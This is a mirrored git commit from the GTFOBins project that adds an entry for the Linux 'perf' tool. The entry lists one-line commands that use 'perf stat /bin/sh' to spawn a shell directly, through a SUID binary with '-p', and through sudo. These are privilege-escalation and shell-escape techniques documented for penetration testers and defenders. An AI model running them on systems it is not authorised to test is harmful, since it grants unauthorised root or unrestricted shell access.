mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add perf
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
04b2874819
commit
a981bc1968
12
_gtfobins/perf.md
Normal file
12
_gtfobins/perf.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
perf stat /bin/sh
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./perf stat /bin/sh -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo perf stat /bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user